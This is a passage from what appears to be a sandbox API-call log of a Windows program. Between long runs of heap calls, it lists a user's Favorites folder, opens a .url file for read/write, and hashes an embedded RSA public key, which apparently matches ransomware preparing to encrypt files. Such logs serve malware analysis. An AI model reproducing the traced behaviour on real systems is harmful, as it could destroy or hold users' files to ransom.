dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0192.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.982] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.982] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.982] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.982] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0192.982] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.982] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.983] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.983] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0192.983] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.983] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.983] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.983] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.983] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.984] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.984] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.984] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.984] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.984] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.984] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.984] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.984] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0192.985] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.985] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0192.985] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.985] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.985] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0192.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.986] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.986] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.990] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\Links\\") returned="Links\\" [0192.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3c90 [0192.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.991] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\") returned="Favorites\\" [0192.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0192.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0192.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3c90 | out: hHeap=0x2c0000) returned 1 [0192.991] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0192.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0192.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0192.992] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0192.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0192.992] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0192.992] PathFindFileNameW (pszPath="") returned="" [0192.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.992] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\Links\\*" (normalized: "c:\\users\\keecfmwgj\\favorites\\links\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x4d32fba0, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0192.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.993] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x4d32fba0, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0192.993] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x4d32fba0, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0192.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x345758 [0192.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.993] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\Links\\desktop.ini") returned=".ini" [0192.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x345758 | out: hHeap=0x2c0000) returned 1 [0192.994] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ef07f70, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 1 [0192.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0192.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.994] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\Links\\Web Slice Gallery.url") returned=".url" [0192.995] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\links\\web slice gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0192.995] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=226) returned 1 [0192.995] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0192.998] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xbc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.999] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0193.000] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0193.000] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0193.000] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.000] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0xe2, lpOverlapped=0x0) returned 1 [0193.000] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.000] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0193.000] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.000] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.000] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b860) returned 1 [0193.002] CryptCreateHash (in: hProv=0x31b860, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0193.002] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0193.002] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0193.002] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0193.002] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0193.002] GetLastError () returned 0x0 [0193.002] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0193.002] CryptReleaseContext (hProv=0x31b860, dwFlags=0x0) returned 1 [0193.002] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0193.002] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0193.002] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0193.002] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0193.002] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0193.002] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0193.003] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0193.003] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe0) returned 0x30a1f0 [0193.003] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0193.003] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0193.003] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0193.003] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0193.003] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adf6e8 [0193.003] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0193.003] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3c90 [0193.003] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6200 [0193.003] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3cd8 [0193.003] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6218 [0193.003] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6248 [0193.003] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae62a8 [0193.003] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6260 [0193.003] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0193.003] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0193.004] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0193.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0193.004] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6248 | out: hHeap=0x2c0000) returned 1 [0193.004] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6260 | out: hHeap=0x2c0000) returned 1 [0193.004] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62a8 | out: hHeap=0x2c0000) returned 1 [0193.004] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0193.004] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0193.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae62a8 [0193.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0193.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6260 [0193.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0193.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6248 [0193.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0193.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0193.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0193.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0193.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0193.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0193.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0193.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0193.005] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0193.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6260 | out: hHeap=0x2c0000) returned 1 [0193.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0193.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6248 | out: hHeap=0x2c0000) returned 1 [0193.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0193.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0193.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62a8 | out: hHeap=0x2c0000) returned 1 [0193.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0193.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0193.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0193.007] GetCurrentThreadId () returned 0x5d8 [0193.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0193.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae7728 [0193.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0193.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b860 [0193.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0193.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0193.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0193.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0193.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0193.008] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0193.008] GetCurrentThreadId () returned 0x5d8 [0193.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0193.008] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0193.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0193.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0193.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0193.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0193.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0193.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0193.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0193.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0193.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40478 [0193.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0193.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0193.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0193.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae62a8 [0193.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0193.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0193.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0193.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0193.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0193.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0193.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0193.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0193.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6248 [0193.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0193.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0193.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0193.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0193.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0193.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, 